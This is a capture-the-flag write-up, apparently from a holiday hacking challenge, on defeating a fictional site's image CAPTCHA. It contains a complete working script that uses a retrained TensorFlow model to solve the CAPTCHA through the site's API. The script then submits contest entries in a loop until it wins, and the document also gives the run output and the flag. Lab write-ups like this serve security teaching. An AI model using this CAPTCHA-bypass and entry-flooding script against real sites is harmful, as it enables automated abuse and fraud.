Bypassing the Frido Sleigh CAPTEHA

Objective 8

Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

The initial task was to follow through the demo that Chris Davis had made available at https://github.com/chrisjd20/img_rec_tf_ml_demo. Krampus also gave a lot of useful data when talking to him in the Steam Tunnels, such as an api script and lots of presorted images to train the model on.

The first thing to do was to train the model. I removed the demo training images from img_rec_tf_ml_demo/training_images and extracted the 'capteha' images into this directory.

I ran:

python3 retrain.py --image_dir ./training_images/

Once the training was complete, I grabbed some images from the Frido Sleigh web site to test the model on and it worked … phew.

The next task was to modify the capteha_api.py so that it would run against the website:

The file ended up as follows:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

# imports from predict_images_using_trained_model.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys
import base64

# copied in functions from predict_images_using_trained_model.py
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_uuid, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'prediction':labels[prediction].title(), 'percent':results[prediction], 'uuid':img_uuid})

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result


def main():
    yourREALemailAddress = "redacted@example.com"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries each containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    '''
    BEGIN IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()

    for image in b64_images:

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = base64.b64decode(image['base64']) 
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, image['uuid'], labels, input_operation, output_operation)).start()


    print('Waiting For Threads to Finish...')
    while q.qsize() < len(b64_images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    # now create an array of the results
    img_uuids=[]
    for prediction in prediction_results:
        # check if the prediction label is one of the images that we are looking for
        if prediction['prediction'] in challenge_image_types:
            img_uuids.append(prediction['uuid'])

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join( img_uuids )
    print(final_answer)

    '''
    END IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

I then ran this code:

$ python3 ./capteha_api.py 
WARNING:tensorflow:From ./capteha_api.py:11: The name tf.logging.set_verbosity is deprecated. Please use tf.compat.v1.logging.set_verbosity instead.

WARNING:tensorflow:From ./capteha_api.py:11: The name tf.logging.ERROR is deprecated. Please use tf.compat.v1.logging.ERROR instead.

Waiting For Threads to Finish...
59cc6de0-e585-11e9-97c1-309c23aaf0ac,82af8dcc-e585-11e9-97c1-309c23aaf0ac,b4c65e13-e584-11e9-97c1-309c23aaf0ac,75ee4cd1-e585-11e9-97c1-309c23aaf0ac,38448ba0-e588-11e9-97c1-309c23aaf0ac,231d8ff4-e587-11e9-97c1-309c23aaf0ac,9461607a-e587-11e9-97c1-309c23aaf0ac,55badeec-e585-11e9-97c1-309c23aaf0ac,45ef9d2a-e588-11e9-97c1-309c23aaf0ac,f96c901a-e586-11e9-97c1-309c23aaf0ac,a0a92136-e586-11e9-97c1-309c23aaf0ac,eb38fcf9-e585-11e9-97c1-309c23aaf0ac,93f6773f-e586-11e9-97c1-309c23aaf0ac,7e592ac9-e586-11e9-97c1-309c23aaf0ac,57a42424-e586-11e9-97c1-309c23aaf0ac,411123dc-e586-11e9-97c1-309c23aaf0ac,3b0123b3-e586-11e9-97c1-309c23aaf0ac,0a51b749-e586-11e9-97c1-309c23aaf0ac,eb919b80-e585-11e9-97c1-309c23aaf0ac,099befb6-e586-11e9-97c1-309c23aaf0ac
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
Submitting lots of entries until we win the contest! Entry #2
Submitting lots of entries until we win the contest! Entry #3
[SNIP]
Submitting lots of entries until we win the contest! Entry #103
Submitting lots of entries until we win the contest! Entry #104
{"data":"<h2 id=\"result_header\"> Entries for email address redacted@example.com no longer accepted as our systems show your email was already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to arrive in your inbox or check your spam filter settings. <br><br> Congratulations and Happy Holidays!</h2>","request":true}

$

I then received an email with the code

Congratulations

Answer

The Answer is “8Ia8LiZEwvyZr2WO”